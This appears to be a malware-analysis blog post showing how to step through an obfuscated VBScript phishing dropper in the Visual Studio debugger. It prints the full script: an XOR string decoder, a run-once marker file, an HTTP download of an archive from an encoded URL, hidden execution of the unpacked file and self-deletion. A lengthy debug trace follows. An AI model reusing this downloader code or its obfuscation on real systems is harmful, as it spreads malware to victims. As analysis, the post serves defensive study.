2018-10-12 Using Visual Studio to debug VBScript

There was a phishing email that came in the other day that looked interesting. When I went to the URL found in the PDF, it linked to an ARJ archive file. Once I downloaded this file and extracted it, I saw that there was a VBScript file. Opening this file gave me the following code (also available at my GitHub located here).

' Script-level variables shared by the decoder function and the main body.
' strChaveCript holds the XOR key read by the string decoder; the str*Path* /
' str*Nome* variables hold file-system locations built at run time; the obj*
' variables hold COM objects created from decoded ProgID strings.
' None of these names is referenced as a literal string, so they carry no
' value as indicators on their own.
Dim strChaveCript
Dim arrFileCaixa
Dim strLinkCaixaCompactada
Dim XjA7jV8W2q5PQEpLmbssbKYikjHxbi6T6KbxPrXzip
Dim strPathLocalCaixa
Dim strPathLocalFinalCaixa
Dim strNomeArquivoCaixaZip
Dim strNomeArquivoModuloBTC
Dim strPathArquivoModuloBTC
Dim objFileSystemObject
Dim objVarWHSWindowsShell
Dim strPathArquivoLog
Dim strArquivoLogComplemento
Dim objShelApplication
Dim objArquivosNaCaixaZip
Dim objFileZipedNaCaixaZip
Dim objHttpParaDownload
Dim objStreamArquivoDownload
Dim strLinhaComandoAddRegistro
' Returns the single character for the given character code (a thin wrapper
' around Chr).
' The decoder calls this with 38 and 104, i.e. "&" and "h", so that the "&h"
' hex-literal prefix is assembled at run time and never appears in the file
' as plain text.
Function RetornaCharFromNumber(intCodeChar)
Dim strCharRetorno
strCharRetorno = Chr(intCodeChar)
RetornaCharFromNumber = strCharRetorno
End Function
' String decoder: turns a hex-encoded, obfuscated argument into plain text.
'
' Input : strParamTextoAbertoEntrada - a string of two-character hex bytes.
'         The first byte is the starting offset; every following byte is one
'         encoded character.
' Output: the decoded string ("" when the input is "").
' Reads : the script-level key strChaveCript.
'
' Per encoded byte: XOR it with the next key character (the key position is
' 1-based and wraps back to 1 after the last character), subtract the
' previous encoded byte (the first data byte uses the leading offset byte),
' wrapping by 255 when the result would not be positive.
' Because each byte depends on the one before it, the same plain text can be
' stored under different hex strings, and every ProgID, path and URL used by
' the script is absent from the file as readable text.
Function rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z(strParamTextoAbertoEntrada)
' Empty input decodes to an empty string.
IF (strParamTextoAbertoEntrada = "") Then
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = ""
Exit Function
End IF
Dim intCryptFuncKeyLength
Dim intCryptFuncKeyPosition
Dim intCryptFuncOffSet
Dim strCryptFuncResult
Dim intCryptFuncSourcePosition
Dim intCryptFuncSourceAscii
Dim intCryptFuncTempSourceAscii
intCryptFuncKeyLength = Len(strChaveCript)
intCryptFuncKeyPosition = 0
intCryptFuncOffSet = 0
strCryptFuncResult = ""
intCryptFuncSourcePosition = 0
intCryptFuncSourceAscii = 0
intCryptFuncTempSourceAscii = 0
' Leading byte: "&h" + first two hex digits, converted to a number, is the
' initial offset.
intCryptFuncOffSet = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, 1, 2))
' Walk the remaining input two hex digits (one byte) at a time.
For intCryptFuncSourcePosition = 3 to Len(strParamTextoAbertoEntrada) step 2
intCryptFuncSourceAscii = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104)  & Mid(strParamTextoAbertoEntrada, intCryptFuncSourcePosition, 2))
' Advance the key position, wrapping to the first key character.
If (intCryptFuncKeyPosition < intCryptFuncKeyLength) Then
intCryptFuncKeyPosition = intCryptFuncKeyPosition + 1
Else
intCryptFuncKeyPosition = 1
' NOTE(review): the leading dashes on the next line are not valid VBScript;
' they look like a copy/paste artifact in this listing - confirm against the
' original sample.
------ End If
' XOR with the current key character, then remove the previous byte's value.
intCryptFuncTempSourceAscii = intCryptFuncSourceAscii xor Asc(Mid(strChaveCript, intCryptFuncKeyPosition, 1))
IF (intCryptFuncTempSourceAscii <=  intCryptFuncOffSet) Then
intCryptFuncTempSourceAscii = 255 + intCryptFuncTempSourceAscii - intCryptFuncOffSet
Else
intCryptFuncTempSourceAscii = intCryptFuncTempSourceAscii - intCryptFuncOffSet
End If
strCryptFuncResult = strCryptFuncResult & Chr(intCryptFuncTempSourceAscii)
' The encoded byte just consumed becomes the offset for the next one.
intCryptFuncOffSet = intCryptFuncSourceAscii
Next
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = strCryptFuncResult
End Function
' Builds a random string of intParamTamanhoGeraString characters.
' The alphabet is itself an encoded string that is decoded on every call;
' its decoded value is not shown in this write-up.
' The main body uses the result for folder and file names, so those names
' differ on every run and cannot be matched as fixed file-name indicators.
Function GerarStringRandomica(ByVal intParamTamanhoGeraString)
Dim strRetornoStringGerada
Dim intTamanhoMinGeraString
Dim intTamanhoMaxGeraString
Dim intContador
Dim CONSTSTRINGGERASTRINGLETRAS
CONSTSTRINGGERASTRINGLETRAS = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("4Bff262A5fcb7e96b953fe182d2C4ad663f232D14fD47984AC3fd851D856E82cA04b81BB4CDD30DF79a757fb080213DE26F9319B79c5A5b0B384EB6bF41D19")
' Index range into the alphabet: 1 .. Len(alphabet).
intTamanhoMinGeraString = 1
intTamanhoMaxGeraString = Len(CONSTSTRINGGERASTRINGLETRAS)
' Randomize without an argument seeds Rnd from the system timer.
Randomize
' Append one randomly chosen alphabet character per iteration.
For intContador = 1 to intParamTamanhoGeraString
strRetornoStringGerada = strRetornoStringGerada & _
Mid( CONSTSTRINGGERASTRINGLETRAS, _
Int((intTamanhoMaxGeraString - _
intTamanhoMinGeraString + 1) * _
Rnd + intTamanhoMinGeraString), 1 )
Next
GerarStringRandomica = strRetornoStringGerada
End Function
' ---- Main body -------------------------------------------------------------
' Flow: decode object names and paths -> run-once check on a marker file ->
' download an archive -> unpack it -> rename the unpacked file -> launch it
' hidden -> delete this script.
' Decoded values quoted below are the ones the debug trace in this write-up
' shows; the others are not decoded on the page and are described only by how
' the code uses them.

' Key read by the string decoder.
strChaveCript = "sdC1olSgPcRIV0ODFwTipRTp9AkkjRb2C2QjjzB7OO3fyeV"
' Decodes to "wscript.shell" per the trace.
set objVarWHSWindowsShell = CreateObject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("FA2110309393688fda7E85B86C8E"))
' Decodes to "scripting.filesystemobject" per the trace.
Set objFileSystemObject = CreateObject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("B778bf71eb33CB66B34b1a32d269fe1dD200033Cc06090AE64fe32"))
' Working folder: decodes to a temp folder under %userprofile% per the trace;
' it is created when missing.
strPathLocalCaixa = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("EF66bf70e438c464B44Bd71632016dAE50fb1B23")
strPathLocalCaixa = objVarWHSWindowsShell.ExpandEnvironmentStrings(strPathLocalCaixa)
If Not objFileSystemObject.FolderExists(strPathLocalCaixa) Then
objFileSystemObject.CreateFolder strPathLocalCaixa
End If
' Marker file path: the trace shows the same temp folder for the first part
' and "S46c03kvZM8mSk.~tmp" for the file name.
strPathArquivoLog = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("64FA14C41bE23FE235cb5690bcB724D779a06696")
strPathArquivoLog = objVarWHSWindowsShell.ExpandEnvironmentStrings(strPathArquivoLog)
strArquivoLogComplemento = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("8E92a29bcf6FCE69B843F37Ea2a33f22e41fFB38")
strPathArquivoLog = strPathArquivoLog & strArquivoLogComplemento
set objVarWHSWindowsShell = Nothing
' Run-once guard: when the marker file already exists the script only deletes
' itself. On a host, that marker file therefore indicates the script has
' executed before, and a second detonation in the same VM shows none of the
' download behaviour unless the marker is removed or a snapshot is restored.
If objFileSystemObject.FileExists(strPathArquivoLog) Then
objFileSystemObject.DeleteFile Wscript.ScriptFullName, True
Else
' First run: drop the marker, then fetch and start the next stage.
objFileSystemObject.CreateTextFile(strPathArquivoLog)
' Used as the request URL in the Open call below; decoded value not shown on
' the page.
strLinkCaixaCompactada = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("31EA3BEC6cB086E6718597A85792C779a95Ffa30F72e0e24E62fdd26E12ec558b5BF28291B3EEC1c49ee2EBB72D25Cf230FD6fd82Df1")
' Presumably "wscript.shell" again (it is used for ExpandEnvironmentStrings);
' the hex differs from the first call because the encoding depends on the
' leading offset byte - TODO confirm.
set objVarWHSWindowsShell = CreateObject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("F43fF619BA4bD71f2a2Df60e33c9"))
' Destination folder: decoded base path + 9 random characters + decoded
' suffix, created fresh on each first run.
strPathLocalFinalCaixa = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("A3BB558Bc15ba749df161cda0978E4")
strPathLocalFinalCaixa = objVarWHSWindowsShell.ExpandEnvironmentStrings(strPathLocalFinalCaixa)
strPathLocalFinalCaixa = strPathLocalFinalCaixa & _
GerarStringRandomica(9) & _
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("6FB8")
objFileSystemObject.CreateFolder strPathLocalFinalCaixa
set objVarWHSWindowsShell = Nothing
' Downloaded archive: 9 random characters + decoded extension, saved in the
' working folder.
strNomeArquivoCaixaZip = GerarStringRandomica(9)
strNomeArquivoCaixaZip = strNomeArquivoCaixaZip & rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("9Ebf5e84c5")
XjA7jV8W2q5PQEpLmbssbKYikjHxbi6T6KbxPrXzip = strPathLocalCaixa & strNomeArquivoCaixaZip

' Final file path: destination folder + 7 random characters + decoded
' extension.
strNomeArquivoModuloBTC = GerarStringRandomica(7)
strPathArquivoModuloBTC = strPathLocalFinalCaixa & _
strNomeArquivoModuloBTC & _
rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("1637F832A6")
' Download: an HTTP request object and a stream object (ProgIDs not decoded on
' the page; the Open/Send/responseBody and type/open/write/savetofile calls
' indicate their roles). The request is synchronous (third Open argument is
' False).
Set objHttpParaDownload = createobject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("DB5Aa7488B9565878Aaebf4aDE7DF5051D2b"))
Set objStreamArquivoDownload = createobject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("380A2a3A4FFE41C75B9D609348"))
objHttpParaDownload.Open rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("8EA68FA0"), strLinkCaixaCompactada, False
objHttpParaDownload.Send
' If the stream is ADODB.Stream, as the calls suggest, type 1 is binary and
' save option 2 overwrites an existing file - TODO confirm.
' NOTE(review): nothing checks the HTTP status or the body before it is
' written, which may be where the unhandled exception seen in the VM comes
' from - confirm.
objStreamArquivoDownload.type = 1
objStreamArquivoDownload.open
objStreamArquivoDownload.write objHttpParaDownload.responseBody
objStreamArquivoDownload.savetofile XjA7jV8W2q5PQEpLmbssbKYikjHxbi6T6KbxPrXzip, 2
Set objStreamArquivoDownload = Nothing
Set objHttpParaDownload = Nothing
' Unpack: the archive is opened as a shell namespace and its items are copied
' into the working folder (ProgID not decoded on the page; NameSpace/CopyHere
' indicate a shell application object).
Set objShelApplication = CreateObject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("70b07DA13Fc49e8C9B5Cab47E313b76e994e"))
Set objArquivosNaCaixaZip = objShelApplication.NameSpace(XjA7jV8W2q5PQEpLmbssbKYikjHxbi6T6KbxPrXzip).Items()
objShelApplication.NameSpace(strPathLocalCaixa).CopyHere(objArquivosNaCaixaZip)
' Every extracted item is moved to the same destination path, so this only
' works as written for an archive holding a single file.
For Each objFileZipedNaCaixaZip in objArquivosNaCaixaZip
objFileSystemObject.MoveFile strPathLocalCaixa & objFileZipedNaCaixaZip.Name, strPathArquivoModuloBTC
Next
' Clean-up of the downloaded archive.
objFileSystemObject.DeleteFile XjA7jV8W2q5PQEpLmbssbKYikjHxbi6T6KbxPrXzip, True
Set objShelApplication = Nothing
Set objArquivosNaCaixaZip = Nothing
' Launch: the renamed file is started through the shell object's run method
' with window style 0 and without waiting for it to finish. For detection,
' this appears as a script host process making an outbound HTTP request and
' then starting a randomly named child from a user-profile folder.
Set objVarWHSWindowsShell = CreateObject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("EC37ee11b2738f57e266AD41e407"))
objVarWHSWindowsShell.run """" & strPathArquivoModuloBTC & """", 0, False
' The script removes its own file, so the .vbs may be gone from disk by the
' time the host is examined; the marker file and the dropped file remain.
objFileSystemObject.DeleteFile Wscript.ScriptFullName, True
Set objVarWHSWindowsShell = Nothing
Set objFileSystemObject = Nothing
End If

As you can see, this looks pretty complex (and just confusing to be honest). Manually trying to walk through this code was somewhat confusing since 1) the variable names were all over the place language-wise (some are Italian, Portuguese, and Spanish), 2) there is a missing start to a function (in the code there is a lone “end function” call), and 3) I was not sure where exactly this script started. After a while of trying to step through this by hand, I figured that there had to be a better way. Looking around, I came across this article from ESET talking about how to debug VBScript using Visual Studio, which I had never even thought about using to be honest. For more information about that, see this link. The way that I did it was different from how they did theirs, but it is still good to know.

Once Visual Studio was installed on my VM, I opened the file and walked through some areas setting breakpoints as seen below. This will allow me to step through the script and watch how the script operates.

From here, I started up Visual Studio’s “Developer Command Prompt” and called the script using Wscript along with the arguments of “//X //D” (//X starts the script in the debugger and //D enables active debugging) as seen below.

Once I ran that command, I got prompted for which debug session to use. I chose the existing instance of Visual Studio that had the script open with the breakpoints set.

NOTE: If you get the following screen, I just chose to reload it. The breakpoints should all be kept.

From here, you can see the breakpoints that have been set up. Since I had already run a debug session against the script, you can also see the variables that I was watching. This will come in handy, especially when dealing with how the script gets built out.

At this time you are ready to walk through the script. Use F11 to “Step Into” the code. From here, you can see how this script gets created and the variables populated.

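And below is the code cleaned up after stepping through the script in Visual Studio. Overall the script looks to be creating an array and filling in the required variables bit by bit. It is also using XOR for the obfuscation. Once the script is built out, it then deletes the VBScript file and ends. In the listing above, that self-delete is the branch taken when the marker file in the temp folder already exists; when it does not, the script goes on to download an archive, unpack it and launch the extracted file before deleting itself. When running this script in my VM, I get an unhandled exception call and all activities cease at that time.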

strChaveCript = "sdC1olSgPcRIV0ODFwTipRTp9AkkjRb2C2QjjzB7OO3fyeV"

set objVarWHSWindowsShell = CreateObject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("FA2110309393688fda7E85B86C8E"))
	Function rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z(strParamTextoAbertoEntrada)
		IF (strParamTextoAbertoEntrada = "") Then
		rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = ""
	Exit Function
	
	intCryptFuncKeyLength = Len(strChaveCript)
	intCryptFuncKeyPosition = 0
	intCryptFuncOffSet = 0
	strCryptFuncResult = ""
	intCryptFuncSourcePosition = 0
	intCryptFuncSourceAscii = 0
	intCryptFuncTempSourceAscii = 0
	intCryptFuncOffSet = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, 1, 2))
		Function RetornaCharFromNumber(intCodeChar)
			Dim strCharRetorno
			strCharRetorno = Chr(intCodeChar)
			RetornaCharFromNumber = strCharRetorno
		End Function
		Function RetornaCharFromNumber(intCodeChar)
			Dim strCharRetorno
			strCharRetorno = Chr(intCodeChar)
			RetornaCharFromNumber = strCharRetorno
		End Function

	For intCryptFuncSourcePosition = 3 to Len(strParamTextoAbertoEntrada) step 2
		intCryptFuncSourceAscii = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104)  & Mid(strParamTextoAbertoEntrada, intCryptFuncSourcePosition, 2))
			Function RetornaCharFromNumber(intCodeChar)
				Dim strCharRetorno
				strCharRetorno = Chr(intCodeChar)
				RetornaCharFromNumber = strCharRetorno
			End Function
			Function RetornaCharFromNumber(intCodeChar)
				Dim strCharRetorno
				strCharRetorno = Chr(intCodeChar)
				RetornaCharFromNumber = strCharRetorno
			End Function
	
		If (intCryptFuncKeyPosition < intCryptFuncKeyLength) Then
			intCryptFuncKeyPosition = intCryptFuncKeyPosition + 1
		Else
			intCryptFuncKeyPosition = 1
		End If
	
		intCryptFuncTempSourceAscii = intCryptFuncSourceAscii xor Asc(Mid(strChaveCript, intCryptFuncKeyPosition, 1))
		IF (intCryptFuncTempSourceAscii <=  intCryptFuncOffSet) Then
			intCryptFuncTempSourceAscii = 255 + intCryptFuncTempSourceAscii - intCryptFuncOffSet
		Else
			intCryptFuncTempSourceAscii = intCryptFuncTempSourceAscii - intCryptFuncOffSet
		End If
		
		strCryptFuncResult = strCryptFuncResult & Chr(intCryptFuncTempSourceAscii)
		intCryptFuncOffSet = intCryptFuncSourceAscii
	Next

	rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = strCryptFuncResult
	End Function
################### --- strCryptFuncResult / rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z == wscript.shell --- ###################

Set objFileSystemObject = CreateObject(rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("B778bf71eb33CB66B34b1a32d269fe1dD200033Cc06090AE64fe32"))
	Function rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z(strParamTextoAbertoEntrada)
		IF (strParamTextoAbertoEntrada = "") Then
		rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = ""
	Exit Function
	
	intCryptFuncKeyLength = Len(strChaveCript)
	intCryptFuncKeyPosition = 0
	intCryptFuncOffSet = 0
	strCryptFuncResult = ""
	intCryptFuncSourcePosition = 0
	intCryptFuncSourceAscii = 0
	intCryptFuncTempSourceAscii = 0
	intCryptFuncOffSet = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, 1, 2))
		Function RetornaCharFromNumber(intCodeChar)
			Dim strCharRetorno
			strCharRetorno = Chr(intCodeChar)
			RetornaCharFromNumber = strCharRetorno
		End Function
		Function RetornaCharFromNumber(intCodeChar)
			Dim strCharRetorno
			strCharRetorno = Chr(intCodeChar)
			RetornaCharFromNumber = strCharRetorno
		End Function

	For intCryptFuncSourcePosition = 3 to Len(strParamTextoAbertoEntrada) step 2
		intCryptFuncSourceAscii = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104)  & Mid(strParamTextoAbertoEntrada, intCryptFuncSourcePosition, 2))
			Function RetornaCharFromNumber(intCodeChar)
				Dim strCharRetorno
				strCharRetorno = Chr(intCodeChar)
				RetornaCharFromNumber = strCharRetorno
			End Function
			Function RetornaCharFromNumber(intCodeChar)
				Dim strCharRetorno
				strCharRetorno = Chr(intCodeChar)
				RetornaCharFromNumber = strCharRetorno
			End Function
	
		If (intCryptFuncKeyPosition < intCryptFuncKeyLength) Then
			intCryptFuncKeyPosition = intCryptFuncKeyPosition + 1
		Else
			intCryptFuncKeyPosition = 1
		End If
	
		intCryptFuncTempSourceAscii = intCryptFuncSourceAscii xor Asc(Mid(strChaveCript, intCryptFuncKeyPosition, 1))
		IF (intCryptFuncTempSourceAscii <=  intCryptFuncOffSet) Then
			intCryptFuncTempSourceAscii = 255 + intCryptFuncTempSourceAscii - intCryptFuncOffSet
		Else
			intCryptFuncTempSourceAscii = intCryptFuncTempSourceAscii - intCryptFuncOffSet
		End If
		
		strCryptFuncResult = strCryptFuncResult & Chr(intCryptFuncTempSourceAscii)
		intCryptFuncOffSet = intCryptFuncSourceAscii
	Next
	
	rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = strCryptFuncResult
	End Function
################### --- strCryptFuncResult / rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z == scripting.filesystemobject --- ###################

strPathLocalCaixa = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("EF66bf70e438c464B44Bd71632016dAE50fb1B23")
	Function rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z(strParamTextoAbertoEntrada)
		IF (strParamTextoAbertoEntrada = "") Then
		rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = ""
	Exit Function

intCryptFuncKeyLength = Len(strChaveCript)
	intCryptFuncKeyPosition = 0
	intCryptFuncOffSet = 0
	strCryptFuncResult = ""
	intCryptFuncSourcePosition = 0
	intCryptFuncSourceAscii = 0
	intCryptFuncTempSourceAscii = 0
	intCryptFuncOffSet = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, 1, 2))
		Function RetornaCharFromNumber(intCodeChar)
			Dim strCharRetorno
			strCharRetorno = Chr(intCodeChar)
			RetornaCharFromNumber = strCharRetorno
		End Function
		Function RetornaCharFromNumber(intCodeChar)
			Dim strCharRetorno
			strCharRetorno = Chr(intCodeChar)
			RetornaCharFromNumber = strCharRetorno
		End Function

	For intCryptFuncSourcePosition = 3 to Len(strParamTextoAbertoEntrada) step 2
		intCryptFuncSourceAscii = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104)  & Mid(strParamTextoAbertoEntrada, intCryptFuncSourcePosition, 2))
			Function RetornaCharFromNumber(intCodeChar)
				Dim strCharRetorno
				strCharRetorno = Chr(intCodeChar)
				RetornaCharFromNumber = strCharRetorno
			End Function
			Function RetornaCharFromNumber(intCodeChar)
				Dim strCharRetorno
				strCharRetorno = Chr(intCodeChar)
				RetornaCharFromNumber = strCharRetorno
			End Function
	
		If (intCryptFuncKeyPosition < intCryptFuncKeyLength) Then
			intCryptFuncKeyPosition = intCryptFuncKeyPosition + 1
		Else
			intCryptFuncKeyPosition = 1
		End If
	
		intCryptFuncTempSourceAscii = intCryptFuncSourceAscii xor Asc(Mid(strChaveCript, intCryptFuncKeyPosition, 1))
		IF (intCryptFuncTempSourceAscii <=  intCryptFuncOffSet) Then
			intCryptFuncTempSourceAscii = 255 + intCryptFuncTempSourceAscii - intCryptFuncOffSet
		Else
			intCryptFuncTempSourceAscii = intCryptFuncTempSourceAscii - intCryptFuncOffSet
		End If
		
		strCryptFuncResult = strCryptFuncResult & Chr(intCryptFuncTempSourceAscii)
		intCryptFuncOffSet = intCryptFuncSourceAscii
	Next
	
	rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = strCryptFuncResult
	End Function
################### --- strCryptFuncResult / rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z == %userprofile%\\temp\\ --- ###################

strPathLocalCaixa = objVarWHSWindowsShell.ExpandEnvironmentStrings(strPathLocalCaixa)
If Not objFileSystemObject.FolderExists(strPathLocalCaixa) Then
	objFileSystemObject.CreateFolder strPathLocalCaixa
End If

strPathArquivoLog = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("64FA14C41bE23FE235cb5690bcB724D779a06696")
	Function rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z(strParamTextoAbertoEntrada)
		IF (strParamTextoAbertoEntrada = "") Then
		rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = ""
	Exit Function

	intCryptFuncKeyLength = Len(strChaveCript)
	intCryptFuncKeyPosition = 0
	intCryptFuncOffSet = 0
	strCryptFuncResult = ""
	intCryptFuncSourcePosition = 0
	intCryptFuncSourceAscii = 0
	intCryptFuncTempSourceAscii = 0
	intCryptFuncOffSet = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, 1, 2))
		Function RetornaCharFromNumber(intCodeChar)
			Dim strCharRetorno
			strCharRetorno = Chr(intCodeChar)
			RetornaCharFromNumber = strCharRetorno
		End Function
		Function RetornaCharFromNumber(intCodeChar)
			Dim strCharRetorno
			strCharRetorno = Chr(intCodeChar)
			RetornaCharFromNumber = strCharRetorno
		End Function

	For intCryptFuncSourcePosition = 3 to Len(strParamTextoAbertoEntrada) step 2
		intCryptFuncSourceAscii = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104)  & Mid(strParamTextoAbertoEntrada, intCryptFuncSourcePosition, 2))
			Function RetornaCharFromNumber(intCodeChar)
				Dim strCharRetorno
				strCharRetorno = Chr(intCodeChar)
				RetornaCharFromNumber = strCharRetorno
			End Function
			Function RetornaCharFromNumber(intCodeChar)
				Dim strCharRetorno
				strCharRetorno = Chr(intCodeChar)
				RetornaCharFromNumber = strCharRetorno
			End Function
	
		If (intCryptFuncKeyPosition < intCryptFuncKeyLength) Then
			intCryptFuncKeyPosition = intCryptFuncKeyPosition + 1
		Else
			intCryptFuncKeyPosition = 1
		End If
	
		intCryptFuncTempSourceAscii = intCryptFuncSourceAscii xor Asc(Mid(strChaveCript, intCryptFuncKeyPosition, 1))
		IF (intCryptFuncTempSourceAscii <=  intCryptFuncOffSet) Then
			intCryptFuncTempSourceAscii = 255 + intCryptFuncTempSourceAscii - intCryptFuncOffSet
		Else
			intCryptFuncTempSourceAscii = intCryptFuncTempSourceAscii - intCryptFuncOffSet
		End If
		
		strCryptFuncResult = strCryptFuncResult & Chr(intCryptFuncTempSourceAscii)
		intCryptFuncOffSet = intCryptFuncSourceAscii
	Next
	
	rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = strCryptFuncResult ----------> %userprofile%\\temp\\
	End Function 

strPathArquivoLog = objVarWHSWindowsShell.ExpandEnvironmentStrings(strPathArquivoLog)
strArquivoLogComplemento = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("8E92a29bcf6FCE69B843F37Ea2a33f22e41fFB38")
	Function rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z(strParamTextoAbertoEntrada)
		IF (strParamTextoAbertoEntrada = "") Then
		rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = ""
	Exit Function

	strPathLocalCaixa = objVarWHSWindowsShell.ExpandEnvironmentStrings(strPathLocalCaixa)
If Not objFileSystemObject.FolderExists(strPathLocalCaixa) Then
	objFileSystemObject.CreateFolder strPathLocalCaixa
End If

strPathArquivoLog = rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z("64FA14C41bE23FE235cb5690bcB724D779a06696")
	Function rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z(strParamTextoAbertoEntrada)
		IF (strParamTextoAbertoEntrada = "") Then
		rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = ""
	Exit Function

	intCryptFuncKeyLength = Len(strChaveCript)
	intCryptFuncKeyPosition = 0
	intCryptFuncOffSet = 0
	strCryptFuncResult = ""
	intCryptFuncSourcePosition = 0
	intCryptFuncSourceAscii = 0
	intCryptFuncTempSourceAscii = 0
	intCryptFuncOffSet = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104) & Mid(strParamTextoAbertoEntrada, 1, 2))
		Function RetornaCharFromNumber(intCodeChar)
			Dim strCharRetorno
			strCharRetorno = Chr(intCodeChar)
			RetornaCharFromNumber = strCharRetorno
		End Function
		Function RetornaCharFromNumber(intCodeChar)
			Dim strCharRetorno
			strCharRetorno = Chr(intCodeChar)
			RetornaCharFromNumber = strCharRetorno
		End Function

	For intCryptFuncSourcePosition = 3 to Len(strParamTextoAbertoEntrada) step 2
		intCryptFuncSourceAscii = CInt(RetornaCharFromNumber(38) & RetornaCharFromNumber(104)  & Mid(strParamTextoAbertoEntrada, intCryptFuncSourcePosition, 2))
			Function RetornaCharFromNumber(intCodeChar)
				Dim strCharRetorno
				strCharRetorno = Chr(intCodeChar)
				RetornaCharFromNumber = strCharRetorno
			End Function
			Function RetornaCharFromNumber(intCodeChar)
				Dim strCharRetorno
				strCharRetorno = Chr(intCodeChar)
				RetornaCharFromNumber = strCharRetorno
			End Function
	
		If (intCryptFuncKeyPosition < intCryptFuncKeyLength) Then
			intCryptFuncKeyPosition = intCryptFuncKeyPosition + 1
		Else
			intCryptFuncKeyPosition = 1
		End If
	
		intCryptFuncTempSourceAscii = intCryptFuncSourceAscii xor Asc(Mid(strChaveCript, intCryptFuncKeyPosition, 1))
		IF (intCryptFuncTempSourceAscii <=  intCryptFuncOffSet) Then
			intCryptFuncTempSourceAscii = 255 + intCryptFuncTempSourceAscii - intCryptFuncOffSet
		Else
			intCryptFuncTempSourceAscii = intCryptFuncTempSourceAscii - intCryptFuncOffSet
		End If
		
		strCryptFuncResult = strCryptFuncResult & Chr(intCryptFuncTempSourceAscii)
		intCryptFuncOffSet = intCryptFuncSourceAscii
	Next
	
	rf7SAjuKSEG8EkAWninh50SB70iRgzaJbaHpdSv8z = strCryptFuncResult ----------> S46c03kvZM8mSk.~tmp
	End Function 

strPathArquivoLog = strPathArquivoLog & strArquivoLogComplemento ----------> C:\\Users\\Bill\temp\\S46c03kvZM8mSk.~tmp
set objVarWHSWindowsShell = Nothing
	If objFileSystemObject.FileExists(strPathArquivoLog) Then
		objFileSystemObject.DeleteFile Wscript.ScriptFullName, True

***End of debug session***
